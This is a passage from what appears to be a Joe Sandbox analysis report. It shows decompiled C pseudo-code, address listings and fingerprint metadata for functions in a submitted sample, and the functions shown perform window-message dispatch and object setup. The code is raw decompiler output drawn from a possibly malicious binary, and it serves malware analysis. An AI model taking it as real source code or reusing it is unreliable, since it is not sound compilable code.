												__eax =  *__ebx();
												goto L117;
											case 0x13:
												_push(E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc)));
												_push(E009AC90B(__ebx, __ecx, __edx, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												_t112 =  *((intOrPtr*)(__edi + 0x20)) == __esi;
												__eflags = _t112;
												__eax = 0 | _t112;
												goto L75;
											case 0x14:
												__eax = E009BAD30(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x15:
												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L77;
											case 0x16:
												__esi = __esi >> 0x10;
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L75;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												_push(__esi);
												L81:
												__eax = E009AC90B(__ebx, __ecx, __edx);
												L77:
												_push(__eax);
												goto L66;
											case 0x19:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												goto L84;
											case 0x1a:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__ecx);
												L84:
												_push(__eax);
												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
												goto L75;
											case 0x1b:
												_push(__esi);
												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
												goto L69;
											case 0x1c:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E009AC90B(__ebx, __ecx, __edx, __esi);
												goto L88;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												__eflags = __eax - 0x2a;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													goto L111;
												}
												_push(E009AC90B(__ebx, __ecx, __edx, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L73;
											case 0x1e:
												_push(__esi);
												L66:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L116;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L88:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L75:
												_push(__eax);
												goto L73;
											case 0x22:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L73:
												__ecx = __edi; // executed
												__eax =  *__ebx(); // executed
												goto L118;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t194;
												if(_t194 != 0) {
													goto L118;
												}
												goto L39;
											case 0x24:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x25:
												goto L118;
											case 0x26:
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L118;
												}
												L39:
												 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
												E009AB846(_t235 - 0x14);
												_t172 = 0;
												__eflags = 0;
												goto L40;
											case 0x27:
												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi);
												L48:
												_push(__eax);
												L110:
												_push( *(__ebp + 0xc));
												goto L111;
											case 0x28:
												_push(E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags, __esi));
												goto L115;
											case 0x29:
												_push(__esi);
												__eax = E009BC05D(__ebx, __ecx, __edx, __edi, __esi, __eflags,  *(__ebp + 0xc));
												goto L69;
											case 0x2a:
												__ecx = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = __esi;
												__eax = __esi >> 0x10;
												__ecx = __eax;
												__ecx = __eax & 0x0000f000;
												_push(__ecx);
												__eax = __eax & 0x00000fff;
												__eflags = __eax;
												_push(__eax);
												__eax = E009AC90B(__ebx, __ecx, __edx,  *(__ebp + 0xc));
												goto L104;
											case 0x2b:
												__eax =  *(__ebp + 0xc) & 0x000000ff;
												_push(__esi);
												L69:
												_push(__eax);
												L111:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L118;
											case 0x2c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L104:
												_push(__eax);
												goto L105;
											case 0x2d:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												_push( *(__ebp + 0xc));
												L105:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
										}
									}
									_t179 =  *(_t235 - 0x18);
									_t58 =  &(_t179[1]);
									 *_t58 = _t179[1] & 0x00000000;
									__eflags =  *_t58;
									E009AB846(_t235 - 0x14);
									goto L39;
								}
								_t182 = _t203;
								__eflags =  *(_t235 + 0x10) - _t182[2];
								if( *(_t235 + 0x10) != _t182[2]) {
									goto L25;
								}
								_t205 = _t182[1];
								 *(_t235 + 0x10) = _t205;
								E009AB846(_t235 - 0x14);
								__eflags = _t205;
								if(_t205 == 0) {
									goto L39;
								}
								__eflags =  *(_t235 + 8) - 0xc000;
								if( *(_t235 + 8) < 0xc000) {
									goto L29;
								}
								goto L113;
							}
							__eflags =  *(_t156 + 0x74);
							if( *(_t156 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t198 - 0x200;
							if(_t198 < 0x200) {
								L16:
								__eflags = _t198 - 0x100;
								if(_t198 < 0x100) {
									L18:
									__eflags = _t198 - 0x281 - 0x10;
									if(_t198 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t186 =  *((intOrPtr*)( *( *(_t232 + 0x68)) + 0x94))(_t198,  *((intOrPtr*)(_t235 + 0xc)), _t234, _t235 - 0x10);
									__eflags = _t186;
									if(_t186 != 0) {
										goto L118;
									}
									goto L20;
								}
								__eflags = _t198 - 0x10f;
								if(_t198 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t198 - 0x209;
							if(_t198 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t190 = E009AE919(_t198, _t228, _t232, _t232, _t234, _t234 >> 0x10);
							__eflags = _t190;
							if(_t190 != 0) {
								L2:
								 *((intOrPtr*)(_t235 - 0x10)) = 1;
								L118:
								_t169 =  *((intOrPtr*)(_t235 + 0x14));
								if(_t169 != 0) {
									 *_t169 =  *((intOrPtr*)(_t235 - 0x10));
								}
								 *(_t235 - 4) =  *(_t235 - 4) | 0xffffffff;
								E009AB846(_t235 - 0x14);
								_t172 = 1;
								L40:
								return E00AAD30A(_t172);
							}
							goto L12;
						}
					}
					_t226 =  *(_t235 + 0x10);
					__eflags =  *_t226;
					if( *_t226 == 0) {
						goto L39;
					}
					_push(_t235 - 0x10);
					_push(_t226);
					_push( *((intOrPtr*)(_t235 + 0xc)));
					_t194 =  *((intOrPtr*)( *__ecx + 0xf8))();
					goto L6;
				}
				_push( *(_t235 + 0x10));
				_push( *((intOrPtr*)(_t235 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xf4))() == 0) {
					goto L39;
				}
				goto L2;
			}


























      0x009aeef6
      0x009aeef6
      0x009aef00
      0x009aef05
      0x009aef09
      0x009aef0c
      0x009aef13
      0x009aef16
      0x009aef1f
      0x009aef43
      0x009aef46
      0x009aef72
      0x009aef75
      0x009aef78
      0x009aef85
      0x009aef85
      0x009aef8a
      0x009aef8d
      0x009aefa3
      0x009aefa3
      0x009aefa6
      0x009aefa8
      0x009aeff7
      0x009aeffb
      0x009af008
      0x009af011
      0x009af01c
      0x009af022
      0x009af025
      0x009af027
      0x009af057
      0x009af057
      0x009af05a
      0x009af060
      0x009af062
      0x009af0f1
      0x009af0f1
      0x009af0f4
      0x00000000
      0x00000000
      0x009af06a
      0x009af071
      0x009af073
      0x009af075
      0x009af0b9
      0x009af0be
      0x009af0dc
      0x009af0e1
      0x009af0e3
      0x009af0e5
      0x00000000
      0x00000000
      0x009af0c7
      0x009af0c9
      0x009af48e
      0x009af491
      0x009af496
      0x009af496
      0x009af499
      0x009af499
      0x009af49a
      0x009af49a
      0x009af49d
      0x009af49f
      0x009af4a1
      0x009af4a1
      0x00000000
      0x009af4a1
      0x009af0cf
      0x009af0d1
      0x009af0d3
      0x009af0d8
      0x009af0d8
      0x009af0db
      0x009af0db
      0x009af0e7
      0x009af0ea
      0x009af0ec
      0x009af0ee
      0x00000000
      0x009af0ee
      0x009af077
      0x009af07a
      0x009af07d
      0x009af082
      0x009af085
      0x009af087
      0x00000000
      0x00000000
      0x009af08c
      0x009af092
      0x009af097
      0x009af0a0
      0x009af0a3
      0x009af0a6
      0x00000000
      0x00000000
      0x009af0ac
      0x00000000
      0x009af137
      0x00000000
      0x00000000
      0x009af141
      0x00000000
      0x00000000
      0x009af15b
      0x009af15d
      0x009af15d
      0x009af160
      0x009af161
      0x009af164
      0x009af168
      0x00000000
      0x00000000
      0x009af177
      0x009af17b
      0x00000000
      0x00000000
      0x009af182
      0x009af138
      0x009af138
      0x009af13a
      0x00000000
      0x00000000
      0x009af185
      0x009af18d
      0x009af190
      0x009af196
      0x009af19a
      0x009af19d
      0x009af1a2
      0x009af1a4
      0x009af1a8
      0x009af1ac
      0x009af1af
      0x009af1b4
      0x009af1b6
      0x009af1b8
      0x009af1bb
      0x009af1bd
      0x009af1c2
      0x009af1c5
      0x009af1ca
      0x009af1cc
      0x009af1ce
      0x009af1ce
      0x009af1cc
      0x009af1d1
      0x009af1d1
      0x009af1d7
      0x009af1d8
      0x009af1d9
      0x009af1dc
      0x009af1dd
      0x009af1df
      0x009af1e1
      0x009af1e5
      0x009af1e5
      0x009af1e5
      0x009af1e9
      0x009af1ef
      0x009af1f2
      0x009af1f6
      0x00000000
      0x00000000
      0x009af20c
      0x009af214
      0x009af217
      0x009af21a
      0x009af21d
      0x009af220
      0x009af221
      0x009af223
      0x009af227
      0x009af229
      0x009af22d
      0x009af1fb
      0x009af1fb
      0x009af1fe
      0x009af202
      0x00000000
      0x00000000
      0x009af232
      0x009af235
      0x009af235
      0x009af238
      0x009af23a
      0x00000000
      0x00000000
      0x009af24c
      0x009af24f
      0x009af250
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009af25f
      0x009af260
      0x009af263
      0x009af23f
      0x009af23f
      0x009af240
      0x009af16d
      0x009af16d
      0x009af16e
      0x009af170
      0x00000000
      0x00000000
      0x009af47e
      0x00000000
      0x00000000
      0x009af268
      0x00000000
      0x00000000
      0x009af274
      0x009af276
      0x00000000
      0x00000000
      0x009af27d
      0x009af280
      0x009af280
      0x009af283
      0x009af284
      0x00000000
      0x00000000
      0x009af294
      0x009af295
      0x00000000
      0x00000000
      0x009af29a
      0x009af29c
      0x009af29c
      0x009af29f
      0x009af2a0
      0x00000000
      0x00000000
      0x009af150
      0x00000000
      0x00000000
      0x009af146
      0x009af148
      0x00000000
      0x00000000
      0x009af2b8
      0x009af2bf
      0x009af2c0
      0x009af2c2
      0x009af2c5
      0x009af2c5
      0x009af2c5
      0x00000000
      0x00000000
      0x009af2ce
      0x00000000
      0x00000000
      0x009af2d9
      0x00000000
      0x00000000
      0x009af2e2
      0x009af2e6
      0x009af2e7
      0x009af2ea
      0x009af2ee
      0x00000000
      0x00000000
      0x009af2f5
      0x00000000
      0x00000000
      0x009af2ff
      0x009af2f8
      0x009af2f8
      0x009af2d3
      0x009af2d3
      0x00000000
      0x00000000
      0x009af302
      0x009af304
      0x009af304
      0x009af307
      0x009af308
      0x00000000
      0x00000000
      0x009af316
      0x009af319
      0x009af31c
      0x009af31f
      0x009af30b
      0x009af30b
      0x009af30f
      0x00000000
      0x00000000
      0x009af322
      0x009af326
      0x00000000
      0x00000000
      0x009af330
      0x009af333
      0x009af333
      0x009af336
      0x009af338
      0x00000000
      0x00000000
      0x009af344
      0x009af347
      0x009af34a
      0x009af34d
      0x009af350
      0x009af353
      0x009af356
      0x009af359
      0x009af36d
      0x009af36e
      0x00000000
      0x009af36e
      0x009af361
      0x009af362
      0x009af365
      0x00000000
      0x00000000
      0x009af374
      0x009af26b
      0x009af26b
      0x009af26d
      0x00000000
      0x00000000
      0x009af37a
      0x009af37b
      0x009af37e
      0x009af380
      0x00000000
      0x00000000
      0x009af11f
      0x009af122
      0x009af125
      0x009af128
      0x009af129
      0x009af129
      0x00000000
      0x00000000
      0x009af387
      0x009af38a
      0x009af38b
      0x009af33d
      0x009af33d
      0x009af33e
      0x009af2c8
      0x009af2c8
      0x00000000
      0x00000000
      0x009af390
      0x009af393
      0x009af396
      0x009af399
      0x009af2a3
      0x009af2a3
      0x009af2a4
      0x009af2a7
      0x009af2a7
      0x009af2a9
      0x00000000
      0x00000000
      0x009af39f
      0x009af3a2
      0x009af3a5
      0x009af3a8
      0x009af3a9
      0x009af3ad
      0x009af3b0
      0x009af3b1
      0x009af3b5
      0x009af3b6
      0x009af3b8
      0x009af3ba
      0x009aef65
      0x009aef65
      0x009aef67
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009af3c2
      0x009af3c5
      0x009af3c8
      0x009af3cb
      0x009af3cc
      0x009af3d0
      0x009af3d3
      0x009af3d4
      0x009af3d8
      0x009af3d9
      0x009af3db
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009af3e2
      0x009af3e4
      0x009af3e6
      0x009af3e9
      0x009af3eb
      0x00000000
      0x00000000
      0x009af109
      0x009af109
      0x009af110
      0x009af115
      0x009af115
      0x00000000
      0x00000000
      0x009af3f7
      0x009af155
      0x009af155
      0x009af47f
      0x009af47f
      0x00000000
      0x00000000
      0x009af407
      0x00000000
      0x00000000
      0x009af40d
      0x009af411
      0x00000000
      0x00000000
      0x009af41b
      0x009af41e
      0x009af41f
      0x009af421
      0x009af424
      0x009af426
      0x009af42c
      0x009af42d
      0x009af42d
      0x009af432
      0x009af436
      0x00000000
      0x00000000
      0x009af445
      0x009af449
      0x009af288
      0x009af288
      0x009af482
      0x009af482
      0x009af484
      0x00000000
      0x00000000
      0x009af44f
      0x009af452
      0x009af455
      0x009af458
      0x009af459
      0x009af45d
      0x009af460
      0x009af461
      0x009af43b
      0x009af43b
      0x00000000
      0x00000000
      0x009af467
      0x009af46a
      0x009af46d
      0x009af470
      0x009af471
      0x009af475
      0x009af478
      0x009af479
      0x009af43c
      0x009af43c
      0x009af43e
      0x00000000
      0x00000000
      0x009af0ac
      0x009af0fa
      0x009af0fd
      0x009af0fd
      0x009af0fd
      0x009af104
      0x00000000
      0x009af104
      0x009af02c
      0x009af02e
      0x009af031
      0x00000000
      0x00000000
      0x009af033
      0x009af039
      0x009af03c
      0x009af041
      0x009af043
      0x00000000
      0x00000000
      0x009af049
      0x009af050
      0x00000000
      0x00000000
      0x00000000
      0x009af052
      0x009aefaa
      0x009aefae
      0x00000000
      0x00000000
      0x009aefb0
      0x009aefb6
      0x009aefc0
      0x009aefc0
      0x009aefc6
      0x009aefd0
      0x009aefd6
      0x009aefd9
      0x00000000
      0x00000000
      0x009aefdb
      0x009aefe9
      0x009aefef
      0x009aeff1
      0x00000000
      0x00000000
      0x00000000
      0x009aeff1
      0x009aefc8
      0x009aefce
      0x00000000
      0x00000000
      0x00000000
      0x009aefce
      0x009aefb8
      0x009aefbe
      0x00000000
      0x00000000
      0x00000000
      0x009aef8f
      0x009aef9a
      0x009aef9f
      0x009aefa1
      0x009aef37
      0x009aef37
      0x009af4a4
      0x009af4a4
      0x009af4a9
      0x009af4ae
      0x009af4ae
      0x009af4b0
      0x009af4b7
      0x009af4be
      0x009af117
      0x009af11c
      0x009af11c
      0x00000000
      0x009aefa1
      0x009aef8d
      0x009aef48
      0x009aef4b
      0x009aef4d
      0x00000000
      0x00000000
      0x009aef58
      0x009aef59
      0x009aef5a
      0x009aef5f
      0x00000000
      0x009aef5f
      0x009aef21
      0x009aef26
      0x009aef31
      0x00000000
      0x00000000
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 1309b4d588f64a198a6a5067960b9966944cdc2a9988f31da65e463e0a7186de
      • Instruction ID: ee9d6c21e74b12343478975dcff6ef389cb13b1001ea89159e4343ef240d74d9
      • Opcode Fuzzy Hash: 1309b4d588f64a198a6a5067960b9966944cdc2a9988f31da65e463e0a7186de
      • Instruction Fuzzy Hash: 24B15E70A0020ADFDF14DFA4C9D4BAE7BB8EF4A314F108469F8159B292D735DA41DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B528B Relevance: 1.7, APIs: 1, Instructions: 151COMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E009B528B(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t67;
				void* _t73;
				intOrPtr* _t76;
				signed int _t92;
				signed int _t97;
				signed int _t106;
				void* _t107;
				void* _t131;
				intOrPtr* _t133;
				intOrPtr* _t135;
				void* _t136;

				_t131 = __edx;
				_push(0xc);
				E00AAD232(0xac8442, __ebx, __edi, __esi);
				_t133 = __ecx;
				_t135 =  *((intOrPtr*)(__ecx + 0x88));
				_t106 = 0;
				 *((intOrPtr*)(_t136 - 0x10)) = 0;
				 *((intOrPtr*)(_t136 - 0x14)) = 0;
				if(_t135 == 0) {
					_t135 =  *((intOrPtr*)( *__ecx + 0x6c))();
					 *((intOrPtr*)(_t136 - 0x14)) = 1;
					L6:
					__eflags = _t135 - _t106;
					if(__eflags != 0) {
						__eflags =  *((intOrPtr*)(_t136 - 0x10)) - _t106;
						if( *((intOrPtr*)(_t136 - 0x10)) != _t106) {
							L12:
							__eflags =  *((intOrPtr*)(_t136 + 8)) - _t106;
							if(__eflags != 0) {
								E009B0648( *((intOrPtr*)(E009BD77F(_t106, _t133, _t135, __eflags) + 4)));
								 *(_t136 - 4) = _t106;
								_t107 =  *((intOrPtr*)( *_t135 + 0x60))();
								 *((intOrPtr*)( *_t135 + 0x64))(0);
								_t67 =  *((intOrPtr*)( *_t135 + 0x7c))( *((intOrPtr*)(_t136 + 8)));
								__eflags = _t67;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t135 + 0x58))( *((intOrPtr*)(_t136 + 8)),  *((intOrPtr*)(_t136 + 0xc)));
									 *((intOrPtr*)( *_t135 + 0xd0))(1);
									 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
									E009AF81E(_t107, _t136 + 0xb, _t133, _t135, __eflags);
									_t106 = 0;
									__eflags = 0;
									L26:
									_t73 = E009B2B03();
									__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t106;
									if( *((intOrPtr*)(_t136 - 0x14)) != _t106) {
										__eflags =  *((intOrPtr*)(_t73 + 0x20)) - _t106;
										if( *((intOrPtr*)(_t73 + 0x20)) == _t106) {
											 *((intOrPtr*)(_t73 + 0x20)) =  *((intOrPtr*)(_t136 - 0x10));
										}
									}
									 *((intOrPtr*)( *_t133 + 0x74))( *((intOrPtr*)(_t136 - 0x10)), _t135,  *((intOrPtr*)(_t136 + 0x10)));
									_t76 = _t135;
									L30:
									return E00AAD30A(_t76);
								}
								__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t67;
								if(__eflags == 0) {
									__eflags =  *((intOrPtr*)( *_t135 + 0x60))();
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t133 + 0x88))(_t135);
										 *((intOrPtr*)( *_t135 + 0x78))();
									} else {
										 *((intOrPtr*)( *_t135 + 0x64))(_t107);
									}
								} else {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 - 0x10)))) + 0x60))();
								}
								 *(_t136 - 4) =  *(_t136 - 4) | 0xffffffff;
								E009AF81E(_t107, _t136 + 0xb, _t133, _t135, __eflags);
								L3:
								_t76 = 0;
								goto L30;
							}
							 *((intOrPtr*)( *_t133 + 0x88))(_t135);
							__eflags =  *((intOrPtr*)(_t136 + 0x10)) - _t106;
							if( *((intOrPtr*)(_t136 + 0x10)) == _t106) {
								 *((intOrPtr*)(_t135 + 0xa0)) = 1;
							}
							_t92 =  *((intOrPtr*)( *_t135 + 0x78))();
							__eflags = _t92;
							if(_t92 != 0) {
								goto L26;
							} else {
								__eflags =  *((intOrPtr*)(_t136 - 0x14)) - _t106;
								if( *((intOrPtr*)(_t136 - 0x14)) != _t106) {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t136 - 0x10)))) + 0x60))();
								}
								goto L3;
							}
						}
						 *(_t135 + 0x9c) =  *(_t135 + 0x9c) & _t106;
						 *(_t136 - 0x18) =  *(_t135 + 0x9c);
						_t97 =  *((intOrPtr*)( *_t133 + 0x70))(_t135, 0);
						 *((intOrPtr*)(_t136 - 0x10)) = _t97;
						 *(_t135 + 0x9c) =  *(_t136 - 0x18);
						__eflags = _t97;
						if(__eflags != 0) {
							_t106 = 0;
							__eflags = 0;
							goto L12;
						}
						E009B4535(_t106, _t131, _t133, _t135, __eflags);
						 *((intOrPtr*)( *_t135 + 4))(1, 0xf104, _t97, 0xffffffff);
						goto L3;
					}
					_push(0xffffffff);
					_push(_t106);
					_push(0xf104);
					E009B4535(_t106, _t131, _t133, _t135, __eflags);
					goto L3;
				}
				if( *((intOrPtr*)( *_t135 + 0xd8))() != 0) {
					 *((intOrPtr*)(_t136 - 0x10)) = E009A6B56();
					goto L6;
				} else {
					 *0xd0fb78 = 0;
					goto L3;
				}
			}














      0x009b528b
      0x009b528b
      0x009b5292
      0x009b5297
      0x009b5299
      0x009b529f
      0x009b52a1
      0x009b52a4
      0x009b52a9
      0x009b52d5
      0x009b52d7
      0x009b52de
      0x009b52de
      0x009b52e0
      0x009b52f1
      0x009b52f4
      0x009b5339
      0x009b5339
      0x009b533c
      0x009b5385
      0x009b538e
      0x009b5394
      0x009b539c
      0x009b53a6
      0x009b53a9
      0x009b53ab
      0x009b53fe
      0x009b5407
      0x009b540d
      0x009b5414
      0x009b5419
      0x009b5419
      0x009b541b
      0x009b541b
      0x009b5420
      0x009b5423
      0x009b5425
      0x009b5428
      0x009b542d
      0x009b542d
      0x009b5428
      0x009b543b
      0x009b543e
      0x009b5440
      0x009b5445
      0x009b5445
      0x009b53ad
      0x009b53b0
      0x009b53c3
      0x009b53c5
      0x009b53d6
      0x009b53e0
      0x009b53c7
      0x009b53cc
      0x009b53cc
      0x009b53b2
      0x009b53b7
      0x009b53b7
      0x009b53e3
      0x009b53ea
      0x009b52bf
      0x009b52bf
      0x00000000
      0x009b52bf
      0x009b5343
      0x009b5349
      0x009b534c
      0x009b534e
      0x009b534e
      0x009b535c
      0x009b535f
      0x009b5361
      0x00000000
      0x009b5367
      0x009b5367
      0x009b536a
      0x009b5375
      0x009b5375
      0x00000000
      0x009b536a
      0x009b5361
      0x009b52fc
      0x009b5304
      0x009b530c
      0x009b5312
      0x009b5315
      0x009b531b
      0x009b531d
      0x009b5337
      0x009b5337
      0x00000000
      0x009b5337
      0x009b5327
      0x009b5332
      0x00000000
      0x009b5332
      0x009b52e2
      0x009b52e4
      0x009b52e5
      0x009b52ea
      0x00000000
      0x009b52ea
      0x009b52b7
      0x009b52cb
      0x00000000
      0x009b52b9
      0x009b52b9
      0x00000000
      0x009b52b9

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 2fc0fb09d33d4c54df915f04992305c418ad3b948b6d3477d2d754c1be7cae18
      • Instruction ID: 412943f528f751ab2482bfac7292e58ccd3d9350114304a5ec77418072a13190
      • Opcode Fuzzy Hash: 2fc0fb09d33d4c54df915f04992305c418ad3b948b6d3477d2d754c1be7cae18
      • Instruction Fuzzy Hash: CE513930601616DFCB14EFA4C594BADBBF5BF48320F124569E8669B3A1DB709D40CF91
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C9C9A Relevance: 1.6, APIs: 1, Instructions: 85COMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009C9C9A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t71;
				void* _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t77;

				_t73 = __eflags;
				_push(4);
				E00AAD232(0xac9ba6, __ebx, __edi, __esi);
				_t71 = __ecx;
				 *((intOrPtr*)(_t72 - 0x10)) = __ecx;
				E009B0609(__ecx, _t73);
				 *((intOrPtr*)(_t72 - 4)) = 0;
				E009A5D70(__ecx + 0x28, __edx, E009B9D52());
				 *((char*)(_t72 - 4)) = 1;
				E009A5D70(__ecx + 0x84, __edx, E009B9D52());
				 *((intOrPtr*)(__ecx + 0x54)) =  *((intOrPtr*)(_t72 + 8));
				 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(_t72 + 0xc));
				 *((intOrPtr*)(__ecx + 0x6c)) =  *((intOrPtr*)(_t72 + 0x10));
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(_t72 + 0x14));
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
